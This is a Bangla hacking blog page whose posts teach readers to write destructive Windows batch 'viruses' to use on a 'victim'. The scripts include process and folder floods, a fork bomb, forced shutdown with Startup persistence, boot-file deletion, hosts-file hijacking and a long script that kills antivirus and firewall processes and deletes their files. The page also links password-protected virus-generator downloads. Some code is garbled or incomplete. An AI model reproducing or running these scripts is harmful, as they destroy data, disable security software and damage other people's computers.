Pleasehack | World's First, The Largest and Most Popular Bangla Technology site

Showing posts with label VIRUS. Show all posts

HOW TO CREATED VIRUS........

এই পোস্ট এ আমি আপনাদেরকে অন্য কোন সাইট থেকে বা নিজের লেখা ভাইরাস স্ক্রিপ্ট দিয়ে বলতে পারতাম এটি .bat নামে সেভ করুন । আর ভাইরাস বানান আপনার শত্রুকে ধ্বংস করে দিন । কিন্তু এতে আপনি এর গুরুত্ব কতটা বুঝতে পারতেন ? এভাবে আরেকজনের থেকে কপি করে লাভ ই বা কি ??? তাই আমি আপনাদের বলব batch file এর সাতকাহন । তাতে আপনি নিজেই কম্যান্ড দিয়ে ভাইরাস স্ক্রিপ্ট , এন্টিভাইরাস স্ক্রিপ্ট লিখতে পারবেন ।
এখানে আমি কোন স্ক্রিনশট দেব না কারন আমি নিজেও অনেক সাইট পড়ে এবং অভিজ্ঞতা থেকে এটি লিখছি ...............
What are Batch Files ?
একটা উদাহরণ দিয়ে শুরু করা যাক । star থেকে রান এ গিয়ে cmd ওপেন করুন । এখন আপনার ডাইরেক্টরি "Desktop" থেকে সরাতে "Cd Desktop" টাইপ করুন উদ্ধরন চিহ্ন ছাড়া । এখন নিচের তিনটি কম্যান্ড এক এক করে লিখুন ।

1. md x //makes directory 'x' on desktop

2. cd x // changes current directory to 'x'

3. md y // makes a directory 'y' in directory 'x'
লক্ষ্য করুন আমরা কি করলাম । প্রথমে x ফোল্ডার তৈরি করলাম । এরপর এর ভেতরে গিয়ে y ফোল্ডার তৈরি করলাম। এরপর x ডিলিট করে দিলাম ।
এখন এই কাজ টাই একটু অন্য ভাবে করুন । এগুলকে নিয়ে নোটপ্যাড এ কপি করে সেভ করুন । নাম এর শেষ এ .bat থাকতে হবে ।
তাহলে দেখবেন উপরে বর্ণিত কাজ টা হবে ।
তাহলে বোঝা গেল batch হচ্ছে এমন ধরনের ফাইল টাইপ যা হল তার মধ্যে দেয়া কম্যান্ড গুলকে অনুসরন করে কাজ করে । আপনি হয়তবা মনে করবেন Malware বা ছোট Trojan বানান খুব কঠিন । সেরকম না । কিন্তু যে বানাবে তার মানসিকতাই আসল

What can batch viruses do ?
প্রশ্ন হল এদের দিয়ে কি কি কাজ করা যায় ??
এদের দিয়ে অনেক কাজ করা যায় যেমন ধরুন ডাটা ডিলিট করা। ড্রাইভ ফরমেট , তথ্য চুরি , ভাইরাস ইঞ্জেক্ট, পারফর্মেন্স বাধা গ্রস্থ করা । খামাকা মানুষ কে বিপদে ফেলা এসব............
এখন কিছু উদাহরণ প্র্যাকটিস করা যাক। নিচের কোড গুলো পিসিতে সেভ করে দেখুন ।
1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed

//loop variable

start winword

start mspaint //open paint

start notepad

start write

start cmd //open command prompt

start explorer

start control

start calc // open calculator

goto x // infinite loop

প্রথমে আপনাকে @echo off দিয়ে ফাইল কে অন্য ফাইল থেকে আলাদা করতে হবে । এরপর এই সব একসাথে বা আলাদা আলাদাভাবে নোটপ্যাড এ লিখে .bat দিয়ে যে কোন নামে সেভ করুন । এগুলো ক্ষতিকর না । আপনি ওপেন করতে পারেন । তবে এভাবেই কমান্ড কম্বাইন্ড করে victim কে বিরক্ত করা হয় ।

2. Folder flooder

@echo off

md %random% // makes directory/folder.

goto x

%random% এর মাধ্যমে বলা হয়েছে যে কোন ধনাত্মক সংখ্যা প্রিন্ট করতে । যার ফলে এটি ওপেন করলে যে কোন ড্রাইভ এ এটি ফোল্ডার বানাতেই থাকবে । এটি পিসিতে ওপেন করবেন না ।

3.User account flooder

@echo off

net user %random% /add //create user account

goto x

এটি যেকোনো নাম্বার বসিয়ে উইন্ডোজ এ ইউযার account তৈরি করতে থাকবে

4.Shutdown Virus

shutdown -s -t 00 //
এই কোড এর মাধ্যমে পিসি সাথে সাথে বন্ধ হয়ে যাবে । মনে হবে হার্ডডিস্ক ফেইল করেছে

কিন্তু এটি একবার এই হবে আপনি যদি এটি চালু রাখতে চান তবে “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup” এবং “C:\Documents and Settings\All Users\Start Menu\Programs\Startup”তে পেস্ট করতে হবে । যার ফলে পিসি ছাড়া হলে বারবার এটি হতে থাকবে । আপনাকে আই দুই ডিরেক্টরি থেকে ফাইল দিলিট করে এটি বন্ধ করতে হবে ।
5. Deleting boot filesGoto C drive in Win XP , Tools->Folder Option->View
এখন 'Show hidden files and folders'. এ চেক দিয়ে বের হয়ে আসুন । এখন আপনি অপারেটিং সিস্টেম এর ফাইল দেখতেও পাবেন । 'ntldr' নামে একটি ফাইল আছে যা উইন্ডোজ এর বূট নিয়ন্ত্রন করে . এখন একে ডিলিট করতে একটা ব্যাচ ফাইল বানাব

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively

del ntldr //delete ntldr file

এটি রান করার সাথে সাথে ফাইল টি ডিলিট হয়ে যাবে । আপনি নিজের পিসি তে এটি রান করবেন না ।

5. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

এই কোড ফাইল ম্যানেজার কে বলবে গুন হতে । যার ফলে আপনার অজান্তে পিসিতে ক্যাশ মেমরি বেড়ে যাবে শেষ এ পিসি হ্যাঁ ং হবে

6. Extension Changer

@echo off

assoc .txt=anything // this command associates extension .txt with filetype anything.

assoc .exe=anything

assoc .jpeg=anything

assoc .png=anything

assoc .mpeg=anything

প্রতটি ফাইল এর আলাদা ফরমেট আছে যেমন .exe, .jpeg, .mkv ইত্যাদি । এই কোড চালাবার সাথে সাথে সব ফরমেট ও লট পালট হয়ে যাবে এবং । প্রোগ্রাম রি ইন্সটাল করতে হবে । তাই অন্তত পিসি তে এটি চলাবেন না ।

7. DNS Poisoning

আপনার উইন্ডোজ এ ‘hosts’ নামে ফাইল আছে এখানে c:\windows\system32\drivers\etc. আমরা এখানে একটি আইপি এবং ওয়েবসাইট বসিয়ে দিতে পারি . তাহলে আমাদের ব্রাউযার সেই ওয়েবসাইট এ আমাদের নিয়ে যাবে .

@echo off

echo xxx.xxx.xxx.xxx http://www.anything.com > C:\windows\system32\drivers\etc\hosts //এই কম্যান্ড তাহলে আইপি এবং ওয়েবসাইট কে host এ প্রিন্ট করবে

xxx.xxx.xxx.xxx এবং http://www.anything.com এ আপনার কাঙ্খিত আইপি এবং ওয়েবসাইট বসাবেন । এরফলে যে এটি ওপেন করবে সে সেই সাইট ছাড়া তার ব্রাউযার অন্য সাইট দেখতে পাবেনা ।

Limitations of Batch Viruses -:
কিন্তু কিছু সমস্যা আছে ...............
যে কেউ এটি ওপেন না করে নোট প্যাড দিয়ে ভিউ করতে পারে । যার ফলে সে সতরক হয়ে যাবে ।
এটি ভাইরাস হলে আন্টিভাইরাস ও উইন্ডোজ AlaRt দেবে । এর সমাধান আছে ।
কিন্তু আমি বলছি না । খারাপ পারপাসে ব্যাবহার হতে পারে ।

একটা অফ টপিক । ভাল না লাগলে এড়িয়ে যান

এ পর্যন্ত যারা আমার বকবক শুনেছেন তাদের ধারনা হয়েছে এগুলো দিয়ে শুধু আযেবাযে কাজ করা যায় । তা না ......
আমি একটা ছোটখাটো batch antivirus এর কো ড করেছি ।
@echo off
color cb
/////////Rashed Hasan /////////
cls
echo ===============
echo [ Batch-Master]
echo ===============
echo If There's no message ,You are protected.
set /p a=Enter a batch file to scan:
for /f %%x in (
'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat'
) do (
if /i %%x equ %a%.bat (
for /f %%z in (
'findstr /i /b /m "tskill del copy shutdown ipconfig ren reg" %a%.bat'
) do (
if /i %%z equ %a%.bat (
cls
echo Virus Detected!!
echo %a%.bat was deleted....
del %a%.bat & pause >nul
)
)
)
)
pause >nul
_______ BCA ___________
এটি আপনার পিসি তে zekono kichu .bat নামে সেভ করুন । এটিতে আপনি যে কোন .bat ফাইল এর নাম লিখে স্ক্যান করতে পারবেন ।

?া?ি ?ং?

World Top virus code(any hard disk crash))

Just copy the code and paste the notepad than save as """pleasehack.bat"" mind it ".bat"
than save.carefully don"t open bat file.

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

?া?ি ?ং?

TROJAN INJECTING AND TROJAN BACKDOR.......

ট্রোজান আর ব্যাক ডোর হল দুটি পদ্ধতি যার মাধ্যমে একজন হ্যাকার কোন সিস্টেম এ প্রবেশ করতে পারেন ।সাধারনত ব্যাক ডোর বা ট্রোজান একটি সিস্টেম এ অন্য কোন প্রোগ্রাম এর মাধ্যমে প্রবেশ করে ।ইথিকাল হ্যাকার সাধারন ভাবে পরীক্ষা করার জন্য এগুলো ব্যাবহার করে থাকেন । এই দুটি হল ম্যালওয়ার এর একটি রুপ যা অন্য কোন সার্ভার এ অন্য ফাইল এর মাধ্যমে যাবার চেষ্টা করে ।

আর ব্যাক ডোর বলতে বোঝানো হয় একটি পথ তৈরি করা যার মাধ্যমে ট্রোজান কোন সিস্টেম এ প্রবেশ করে। সাধারনত ট্রোজান কোন অন্য ছবি বা মিউজিক ফাইল এর মাধ্যমে ছড়িয়ে যায় । এতে Steganography পদ্ধতি টি ব্যাবহার করা হয় । এটি সম্পর্কে না যানলে আমি এ নিয়ে লিখেছি । সেটি পড়ে নিবেন ।। সাধারন ভাবে ট্রোজান ছড়ানোর সবথেকে সহজ উপায় হল ব্যাচ ফাইল বা একে .exe তে রুপান্তর করে ইন্সটলার এর মাধ্যমে ছড়িয়ে দেয়া । এতে হ্যাকার রা বিভিন্ন ধরনের GUI ব্যাবহার করেন অন্য দের আকৃষ্ট করার জন্য ।
কয়েকটি কমন ট্রোজান :
BackOrifice
Deep Throat
NetBus
Whack a mole
Girlfriend
Masters Paradise
এগুলর মধ্যে সবথেকে বিপদজনক হচ্ছে Girlfriend এবং Netbus । কারন এগুলো ব্যাচ ফাইল এর মাধ্যমে তৈরি করা যায় । এবং কোডের কয়েকটি লাইন পরিবর্তন করে দিলেই দুর্ধর্ষ ভাইরাস এ পরিনত হয় । আপনি যদি হ্যাকার হতে চান বা সিকিউরিটি নিয়ে কাজ করতে চান আপনাকে অবশ্যই এগুলো নিয়ে কাজ করতে হবে । কিন্তু নিজের কম্পিউটার এ গুলো নিয়ে ঘাটাঘাটি না করে কোন ভার্চুয়াল পরিবেশ তৈরি করাই ভাল । যেমন যারা Comodo এর ভার্চুয়াল সিকিউরিটি ব্যাবহার করেন তারা যানেন । এই ভাইরাস গুলো নিয়ে কাজ করা কতটা বিপদজনক ।
ট্রোজান এর প্রকারভেদ
বিভিন্ন ধরেনের ট্রোজান আছে । সেগুলর কয়েকটি নিচে তুলে ধরা হল :
Remote Access Trojans : কোন সিস্টেম এ রিমোট অ্যাক্সেস পেতে ব্যাবহার করা হয়
Data Sending Trijans : এটি সাধারনত ডাটা খুঁজে বের করে হ্যাকার এর কাছে তা পাঠিয়ে দেয় ।
Destructive Trojans: এর সাহায্যে কম্পিউটার এর ক্ষতি করা হয় ।
FTP trojans: এটিকে ব্যাবহার করতে হ্যাকার রা port 21 ব্যাবহার করে থাকেন ।
SSDT: এটির পূর্ণরূপ আপনারা কাজ শুনলেই বুঝতে পারবেন । এর মাধ্যমে কোন নির্দিষ্ট বা অনেকগুল antivirus প্রোগ্রাম কে অকেজ করে দেয়া হয় ।
কয়েকটি ট্রোজান প্রোগ্রাম

Troj_OAJ
এই ট্রোজান টি যে কোন নোটপ্যাড ফাইল কে টারগেট করে । এরপর সেটিকে word ফরমেট পরিবর্তন করে note.com এ নিয়ে যায় । এরপর সেটি windows এর নোটপ্যাড ফোল্ডার এ কপি হয় । এরপর আপনি যতবার নোটপ্যাড খুলবেন ততবার এই ভাইরাস টি আক্টিভ হবে ।
Donald Duck
এটি একটি ব্যাক ডোর ট্রোজান । এটি হ্যাকার কে যেকোনো সিস্টেম এ পুরপরি নিয়ন্ত্রন এনে দেয় । এটার সাথে একটি কি লগার এবং রেজিস্ট্রি এডিট করার প্রগ্রাম থাকে ।এর সাহায্যে সিডি বা ডিভিডি রম খোলা বা বন্ধ করাও সম্ভব হয় । এটি ইঞ্জেক্ট করতে হ্যাকার23476 ও ২৩৪৭৭ ব্যাবহার করে থাকেন
CyberSpy

এটি মূলত একটি স্পাই প্রোগ্রাম । এটি রেজিস্ট্রি তে নিজেকে এন্ট্রি করে নেয়। যার ফলে আন্টিভাইরাস দিয়ে ডিলিট করে দিলেও কম্পিউটার রিবুট করলে আবার এটি আক্টিভ হয়ে যায় ।
Firekill 2000
এই ট্রোজান টি মারাত্তক । এটি সব ধরনের ফায়ারওয়াল , এন্টিভাইরাস কে disable করে দিতে সক্ষম । এমনকি এটি সিকিউরিটি সফটওয়্যার এর নিরাপত্তা কে ধ্বংস করতে .dll ফাইল কে ডিলিট করে দেয় । তখন সিস্টেম আবার সেটআপ দিতে হয় ।
এছাড়া আর অনেক ট্রোজান প্রোগ্রাম আছে । অনেক ট্রোজান Netcat এর সাহায্যে launch করা হয় । আবার অনেক ট্রোজান সার্ভার রুটিং করে ইঞ্জেক্ট করা হয় ।

একটি ট্রোজান ভাইরাস
এটি আমার নিজের কোড করা একটি ছোট ট্রোজান । এটি এন্টিভাইরাস এর সিকিউরিটি কে রুখে দিতে পারবে । এটি মূলত আপনার ওয়িন্দএস এর ফায়ার ওয়াল ও এন্টিভাইরাস এর safe guard কে রুখে দেবে । এটির ইন্টারফেস সবুজ রঙের।
@ echo off
_Rashed Hasan_

∙ rem –
colour Db 03
∙ rem Permanently Kill Anti-Virus
∙ net stop “Security Center”
netsh firewall set opmode mode=disable ∙ tskill /A av* ∙
tskill /A fire*
tskill /A [...].
_BCA_
আপনাদেরকে আর ও একটি বিধ্বংসী ট্রোজান এর লিঙ্ক দিতে পারি । কিন্তু সেটি কম্পিউটার এ রান করবেন না । একটি সহজ ট্রিক হচ্ছে কপি পেস্টিং সাইট যেমন http://www.pastebin.com এ যেয়ে পেস্ট করে সেভ করবেন। সেটি যদি কোন ভাইরাস হয় তবে দেখতে পাবেন আপনার এন্টিভাইরাস সিকিউরিটি warning দেবে। আর সেই লিঙ্ক এ প্রবেশ করতে গেলে আপনার ব্রাউযার থেমে যাবে ।
এই ভাইরাস টি কোন অবস্থাতেই রান করবেন না । এটি ভারতের একজন সিকিউরিটি এক্সপার্ট এর কোড করা
http://www.breakthesecurity.com/2010/12/how-to-disabledelete-your-victims.html

বাঁচার কিছু উপায়
> আপনি যে এন্টিভাইরাস ব্যাবহার করে থাকুন না কেন সেটি আপ টু ডেট থাকতে হবে ।
> সন্দেহ জনক কোন টুল বা লিঙ্ক এ ক্লিক করবেন না ।
> আপনার antivirus এর পাশাপাশি anti spam ও anti rootkit ব্যাবহার করবেন । আমি বলব অ্যান্টিভাইরাস এর সাথে আপনি kaspersky এর TDS killer টুল টী ব্যাবহার করতে পারেন । এটি পুরো পুরি পোর্টেবল একটি টুল ।
তাহলে আজ এই পর্যন্তই ছিল ।

?া?ি ?ং?

VIRUS CREATOR SOFTWARE

SONIC BAT - THE BATCH FILE VIRUS CREATOR

This program creates batch (.bat) viruses and has

varied options to ruin the victim computer in

different ways. We can flood the storage space

on victims' computer by making large number

of files in different folders by using its "folder

flood" feature. It also includes bat to exe

converter to convert your batch virus files i

nto exe virus programs and an icon changer.

Download here:

http://www.mediafire.com/download.php?ijzjmx3kd3t

DELmE's BATCH VIRUS GENERATOR

DELmE's Batch Virus Generator is an amazing virus creation

program with lots of options to infect the victim PC such as format

C: drive, delete all files, disable admin, clean registry, change home

page, kill tasks, antivirus and firewall and lots more.

Download here:

http://www.ziddu.com/download/7051522/DELmE_sBatchVirusGeneratorv2.0.rar.html

Password: hackingguide

BATCH TO EXE CONVERTER

Batch to exe converter is a program to convert batch (.bat)

files to executable (.exe) files. It includes several options such

as including any other file, adding an icon to the file before compilation.

Download here:

http://www.ziddu.com/download/6961652/Batch_to_Exe_converter.rar.html

Password: hackingguide

VIRUS CREATOR

This Virus Creator is a simple one as it gives few options

to infect victim's computer like format system drive,

corrupt system files etc.

Download here:

http://www.ziddu.com/download/6953378/VirusCreatorV.65.rar.html

Password: hackingguide

?া?ি ?ং?

Labels

Blogroll

Total Pageviews

Follow us on facebook

Social Profiles

Contact Form

Carousel

Home Style

Menu

Category 1

Slideshow

Category 2

Category 5

Latest News

Category 4

Category 3

Popular Posts

Weekly Top Post

Blogger Templates

HOW TO CREATED VIRUS........

World Top virus code(any hard disk crash))

TROJAN INJECTING AND TROJAN BACKDOR.......

VIRUS CREATOR SOFTWARE

BATCH TO EXE CONVERTER

VIRUS CREATOR

My Others Website

Blog Archive

Labels

Popular Posts